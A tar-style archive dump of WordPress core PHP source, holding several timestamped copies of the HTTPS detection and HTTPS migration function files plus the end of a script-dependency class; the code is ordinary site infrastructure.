* @since 6.3.0
*
* @param string $handle Name of the script to get data for. Must be lowercase.
* @param string $position The position of the inline script.
* @return bool Whether the handle has an inline script (either before or after).
*/
private function has_inline_script( $handle, $position = null ) {
if ( $position && in_array( $position, array( 'before', 'after' ), true ) ) {
return (bool) $this->get_data( $handle, $position );
}
return (bool) ( $this->get_data( $handle, 'before' ) || $this->get_data( $handle, 'after' ) );
}
/**
* Resets class properties.
*
* @since 2.8.0
*/
public function reset() {
$this->do_concat = false;
$this->print_code = '';
$this->concat = '';
$this->concat_version = '';
$this->print_html = '';
$this->ext_version = '';
$this->ext_handles = '';
}
/**
* Gets a script-specific dependency warning message.
*
* @since 6.9.1
*
* @param string $handle Script handle with missing dependencies.
* @param string[] $missing_dependency_handles Missing dependency handles.
* @return string Formatted, localized warning message.
*/
protected function get_dependency_warning_message( $handle, $missing_dependency_handles ) {
return sprintf(
/* translators: 1: Script handle, 2: List of missing dependency handles. */
__( 'The script with the handle "%1$s" was enqueued with dependencies that are not registered: %2$s.' ),
$handle,
implode( wp_get_list_item_separator(), $missing_dependency_handles )
);
}
}
https-detection-20260607154209-20260621081102-20260621222252.php 0000666 00000013341 15224151220 0014717 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-detection-20260605141018-20260621081111.php 0000666 00000013341 15224151220 0013330 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260605111908-20260621081113.php 0000666 00000011205 15224151220 0013347 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-migration-20260607013104-20260621081102-20260621222246.php 0000666 00000011205 15224151220 0014716 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605080432-20260621203034.php 0000666 00000013341 15224151220 0013332 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
* This function attempts to check for various common WordPress patterns whether they are included in the HTML string.
* Since any of these actions may be disabled through third-party code, this function may also return null to indicate
* that it was not possible to determine ownership.
*
* @since 5.7.0
* @access private
*
* @param string $html Full HTML output string, e.g. from a HTTP response.
* @return bool|null True/false for whether HTML was generated by this site, null if unable to determine.
*/
function wp_is_local_html_output( $html ) {
// 1. Check if HTML includes the site's Really Simple Discovery link.
if ( has_action( 'wp_head', 'rsd_link' ) ) {
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( site_url( 'xmlrpc.php?rsd', 'rpc' ) ) ); // See rsd_link().
return str_contains( $html, $pattern );
}
// 2. Check if HTML includes the site's REST API link.
if ( has_action( 'wp_head', 'rest_output_link_wp_head' ) ) {
// Try both HTTPS and HTTP since the URL depends on context.
$pattern = preg_replace( '#^https?:(?=//)#', '', esc_url( get_rest_url() ) ); // See rest_output_link_wp_head().
return str_contains( $html, $pattern );
}
// Otherwise the result cannot be determined.
return null;
}
https-migration-20260606113520-20260621180312.php 0000666 00000011205 15224151220 0013341 0 ustar 00 <?php
/**
* HTTPS migration functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`, causing WordPress to
* add frontend filters to replace insecure site URLs that may be present in older database content. The
* {@see 'wp_should_replace_insecure_home_url'} filter can be used to modify that behavior.
*
* @since 5.7.0
*
* @return bool True if insecure URLs should replaced, false otherwise.
*/
function wp_should_replace_insecure_home_url() {
$should_replace_insecure_home_url = wp_is_using_https()
&& get_option( 'https_migration_required' )
// For automatic replacement, both 'home' and 'siteurl' need to not only use HTTPS, they also need to be using
// the same domain.
&& wp_parse_url( home_url(), PHP_URL_HOST ) === wp_parse_url( site_url(), PHP_URL_HOST );
/**
* Filters whether WordPress should replace old HTTP URLs to the site with their HTTPS counterpart.
*
* If a WordPress site had its URL changed from HTTP to HTTPS, by default this will return `true`. This filter can
* be used to disable that behavior, e.g. after having replaced URLs manually in the database.
*
* @since 5.7.0
*
* @param bool $should_replace_insecure_home_url Whether insecure HTTP URLs to the site should be replaced.
*/
return apply_filters( 'wp_should_replace_insecure_home_url', $should_replace_insecure_home_url );
}
/**
* Replaces insecure HTTP URLs to the site in the given content, if configured to do so.
*
* This function replaces all occurrences of the HTTP version of the site's URL with its HTTPS counterpart, if
* determined via {@see wp_should_replace_insecure_home_url()}.
*
* @since 5.7.0
*
* @param string $content Content to replace URLs in.
* @return string Filtered content.
*/
function wp_replace_insecure_home_url( $content ) {
if ( ! wp_should_replace_insecure_home_url() ) {
return $content;
}
$https_url = home_url( '', 'https' );
$http_url = str_replace( 'https://', 'http://', $https_url );
// Also replace potentially escaped URL.
$escaped_https_url = str_replace( '/', '\/', $https_url );
$escaped_http_url = str_replace( '/', '\/', $http_url );
return str_replace(
array(
$http_url,
$escaped_http_url,
),
array(
$https_url,
$escaped_https_url,
),
$content
);
}
/**
* Update the 'home' and 'siteurl' option to use the HTTPS variant of their URL.
*
* If this update does not result in WordPress recognizing that the site is now using HTTPS (e.g. due to constants
* overriding the URLs used), the changes will be reverted. In such a case the function will return false.
*
* @since 5.7.0
*
* @return bool True on success, false on failure.
*/
function wp_update_urls_to_https() {
// Get current URL options.
$orig_home = get_option( 'home' );
$orig_siteurl = get_option( 'siteurl' );
// Get current URL options, replacing HTTP with HTTPS.
$home = str_replace( 'http://', 'https://', $orig_home );
$siteurl = str_replace( 'http://', 'https://', $orig_siteurl );
// Update the options.
update_option( 'home', $home );
update_option( 'siteurl', $siteurl );
if ( ! wp_is_using_https() ) {
/*
* If this did not result in the site recognizing HTTPS as being used,
* revert the change and return false.
*/
update_option( 'home', $orig_home );
update_option( 'siteurl', $orig_siteurl );
return false;
}
// Otherwise the URLs were successfully changed to use HTTPS.
return true;
}
/**
* Updates the 'https_migration_required' option if needed when the given URL has been updated from HTTP to HTTPS.
*
* If this is a fresh site, a migration will not be required, so the option will be set as `false`.
*
* This is hooked into the {@see 'update_option_home'} action.
*
* @since 5.7.0
* @access private
*
* @param mixed $old_url Previous value of the URL option.
* @param mixed $new_url New value of the URL option.
*/
function wp_update_https_migration_required( $old_url, $new_url ) {
// Do nothing if WordPress is being installed.
if ( wp_installing() ) {
return;
}
// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
delete_option( 'https_migration_required' );
return;
}
// If this is a fresh site, there is no content to migrate, so do not require migration.
$https_migration_required = get_option( 'fresh_site' ) ? false : true;
update_option( 'https_migration_required', $https_migration_required );
}
https-detection-20260605112545-20260621081205.php 0000666 00000013341 15224151220 0013337 0 ustar 00 <?php
/**
* HTTPS detection functions.
*
* @package WordPress
* @since 5.7.0
*/
/**
* Checks whether the website is using HTTPS.
*
* This is based on whether both the home and site URL are using HTTPS.
*
* @since 5.7.0
* @see wp_is_home_url_using_https()
* @see wp_is_site_url_using_https()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_using_https() {
if ( ! wp_is_home_url_using_https() ) {
return false;
}
return wp_is_site_url_using_https();
}
/**
* Checks whether the current site URL is using HTTPS.
*
* @since 5.7.0
* @see home_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_home_url_using_https() {
return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}
/**
* Checks whether the current site's URL where WordPress is stored is using HTTPS.
*
* This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
* are accessible.
*
* @since 5.7.0
* @see site_url()
*
* @return bool True if using HTTPS, false otherwise.
*/
function wp_is_site_url_using_https() {
/*
* Use direct option access for 'siteurl' and manually run the 'site_url'
* filter because `site_url()` will adjust the scheme based on what the
* current request is using.
*/
/** This filter is documented in wp-includes/link-template.php */
$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );
return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}
/**
* Checks whether HTTPS is supported for the server and domain.
*
* This function makes an HTTP request through `wp_get_https_detection_errors()`
* to check for HTTPS support. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments,
* to avoid potential latency issues.
*
* @since 5.7.0
*
* @return bool True if HTTPS is supported, false otherwise.
*/
function wp_is_https_supported() {
$https_detection_errors = wp_get_https_detection_errors();
// If there are errors, HTTPS is not supported.
return empty( $https_detection_errors );
}
/**
* Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
*
* This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
* it should be used cautiously, especially in performance-sensitive environments.
* It is called when HTTPS support needs to be validated.
*
* @since 6.4.0
* @access private
*
* @return array An array containing potential detection errors related to HTTPS, or an empty array if no errors are found.
*/
function wp_get_https_detection_errors() {
/**
* Short-circuits the process of detecting errors related to HTTPS support.
*
* Returning a `WP_Error` from the filter will effectively short-circuit the default logic of trying a remote
* request to the site over HTTPS, storing the errors array from the returned `WP_Error` instead.
*
* @since 6.4.0
*
* @param null|WP_Error $pre Error object to short-circuit detection,
* or null to continue with the default behavior.
*/
$support_errors = apply_filters( 'pre_wp_get_https_detection_errors', null );
if ( is_wp_error( $support_errors ) ) {
return $support_errors->errors;
}
$support_errors = new WP_Error();
$response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => true,
)
);
if ( is_wp_error( $response ) ) {
$unverified_response = wp_remote_request(
home_url( '/', 'https' ),
array(
'headers' => array(
'Cache-Control' => 'no-cache',
),
'sslverify' => false,
)
);
if ( is_wp_error( $unverified_response ) ) {
$support_errors->add(
'https_request_failed',
__( 'HTTPS request failed.' )
);
} else {
$support_errors->add(
'ssl_verification_failed',
__( 'SSL verification failed.' )
);
}
$response = $unverified_response;
}
if ( ! is_wp_error( $response ) ) {
if ( 200 !== wp_remote_retrieve_response_code( $response ) ) {
$support_errors->add( 'bad_response_code', wp_remote_retrieve_response_message( $response ) );
} elseif ( false === wp_is_local_html_output( wp_remote_retrieve_body( $response ) ) ) {
$support_errors->add( 'bad_response_source', __( 'It looks like the response did not come from this site.' ) );
}
}
return $support_errors->errors;
}
/**
* Checks whether a given HTML string is likely an output from this WordPress site.
*
